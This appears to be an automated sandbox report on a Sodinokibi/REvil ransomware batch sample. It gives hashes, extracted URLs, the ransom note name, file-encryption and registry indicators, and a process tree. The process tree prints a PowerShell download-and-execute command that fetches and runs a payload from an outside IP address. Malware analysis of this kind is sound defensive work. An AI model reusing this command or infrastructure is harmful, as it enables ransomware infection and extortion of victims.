Analysis
-
max time kernel
76s -
max time network
45s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
02-09-2020 21:10
Static task
static1
Behavioral task
behavioral1
Sample
cfc86f216b68d4b768a61dc8091a67ab.bat
Resource
win7
Behavioral task
behavioral2
Sample
cfc86f216b68d4b768a61dc8091a67ab.bat
Resource
win10v200722
General
-
Target
cfc86f216b68d4b768a61dc8091a67ab.bat
-
Size
217B
-
MD5
89876aac9d3c6644f7ae3b4cf68d7a1e
-
SHA1
e37353d60d13106478fd94133ec1ae8b15e51062
-
SHA256
146be0d88aa964787807ec908e13f1eb124530caca22ad1c3d80c73761892e90
-
SHA512
8ea7a17a997a6b12f0acac1951fe0dc70c57221bd2204173597b951e7bf77b3f1f94a5ded81f074f51cb159d4ebe7bf7db1c207fd4febcfae1183788890ee503
Malware Config
Extracted
http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab
Extracted
C:\g2u6d92-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/73FCEC3F69393DC5
http://decryptor.cc/73FCEC3F69393DC5
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 1428 powershell.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\users\admin\pictures\RedoHide.tiff powershell.exe File renamed C:\Users\Admin\Pictures\CheckpointSuspend.png => \??\c:\users\admin\pictures\CheckpointSuspend.png.g2u6d92 powershell.exe File renamed C:\Users\Admin\Pictures\ExportSwitch.png => \??\c:\users\admin\pictures\ExportSwitch.png.g2u6d92 powershell.exe File renamed C:\Users\Admin\Pictures\GrantProtect.png => \??\c:\users\admin\pictures\GrantProtect.png.g2u6d92 powershell.exe File renamed C:\Users\Admin\Pictures\RedoHide.tiff => \??\c:\users\admin\pictures\RedoHide.tiff.g2u6d92 powershell.exe File renamed C:\Users\Admin\Pictures\ResolveFind.tiff => \??\c:\users\admin\pictures\ResolveFind.tiff.g2u6d92 powershell.exe File opened for modification \??\c:\users\admin\pictures\LockBackup.tiff powershell.exe File opened for modification \??\c:\users\admin\pictures\ResolveFind.tiff powershell.exe File renamed C:\Users\Admin\Pictures\HideSuspend.tif => \??\c:\users\admin\pictures\HideSuspend.tif.g2u6d92 powershell.exe File renamed C:\Users\Admin\Pictures\LockBackup.tiff => \??\c:\users\admin\pictures\LockBackup.tiff.g2u6d92 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2x85e4121n.bmp" powershell.exe -
Drops file in Program Files directory 37 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files (x86)\g2u6d92-readme.txt powershell.exe File opened for modification \??\c:\program files\CheckpointDismount.vst powershell.exe File opened for modification \??\c:\program files\GrantClear.vsdm powershell.exe File opened for modification \??\c:\program files\ImportCopy.asx powershell.exe File opened for modification \??\c:\program files\InitializeResume.emz powershell.exe File opened for modification \??\c:\program files\OutSet.rtf powershell.exe File opened for modification \??\c:\program files\ResumeOptimize.docm powershell.exe File opened for modification \??\c:\program files\SelectRedo.ADT powershell.exe File opened for modification \??\c:\program files\BlockConvertTo.crw powershell.exe File opened for modification \??\c:\program files\LimitShow.aifc powershell.exe File opened for modification \??\c:\program files\MeasureSkip.eps powershell.exe File opened for modification \??\c:\program files\ShowPing.3g2 powershell.exe File opened for modification \??\c:\program files\UnpublishHide.doc powershell.exe File opened for modification \??\c:\program files\SplitMount.ini powershell.exe File opened for modification \??\c:\program files\ApproveMove.M2TS powershell.exe File opened for modification \??\c:\program files\EnableConnect.m4v powershell.exe File opened for modification \??\c:\program files\FormatOut.jtx powershell.exe File opened for modification \??\c:\program files\InitializeReceive.wmf powershell.exe File opened for modification \??\c:\program files\LimitUse.i64 powershell.exe File opened for modification \??\c:\program files\ReadDisable.inf powershell.exe File opened for modification \??\c:\program files\RegisterDebug.asp powershell.exe File opened for modification \??\c:\program files\SuspendMerge.3gp powershell.exe File created \??\c:\program files\g2u6d92-readme.txt powershell.exe File opened for modification \??\c:\program files\MeasureRestore.ppsm powershell.exe File opened for modification \??\c:\program files\PingUnregister.clr powershell.exe File opened for modification \??\c:\program files\SaveInvoke.i64 powershell.exe File opened for modification \??\c:\program files\UnpublishStop.wmv powershell.exe File opened for modification \??\c:\program files\AssertSuspend.avi powershell.exe File opened for modification \??\c:\program files\CompleteMount.txt powershell.exe File opened for modification \??\c:\program files\DisableTest.mpeg powershell.exe File opened for modification \??\c:\program files\DisconnectUnblock.raw powershell.exe File opened for modification \??\c:\program files\OutRevoke.pub powershell.exe File opened for modification \??\c:\program files\DebugConvertFrom.pcx powershell.exe File opened for modification \??\c:\program files\DebugUninstall.ogg powershell.exe File opened for modification \??\c:\program files\GroupConfirm.mpeg3 powershell.exe File opened for modification \??\c:\program files\InstallEdit.txt powershell.exe File opened for modification \??\c:\program files\SuspendConvertFrom.vdw powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\ServiceProfiles\LocalService\winhttp\cachev3.dat svchost.exe -
Modifies data under HKEY_USERS 5 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecisionTime = 5d27d3b07e81d601 svchost.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-3e-6f-2c-c8-c7\WpadDecision = "0" svchost.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepid process 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe 1428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
svchost.exepowershell.exevssvc.exedescription pid process Token: SeShutdownPrivilege 2644 svchost.exe Token: SeCreatePagefilePrivilege 2644 svchost.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeDebugPrivilege 1428 powershell.exe Token: SeTakeOwnershipPrivilege 1428 powershell.exe Token: SeBackupPrivilege 2568 vssvc.exe Token: SeRestorePrivilege 2568 vssvc.exe Token: SeAuditPrivilege 2568 vssvc.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 2884 wrote to memory of 1428 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 1428 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 1428 2884 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\cfc86f216b68d4b768a61dc8091a67ab.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/cfc86f216b68d4b768a61dc8091a67ab');Invoke-ABXNAAYIVS;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2568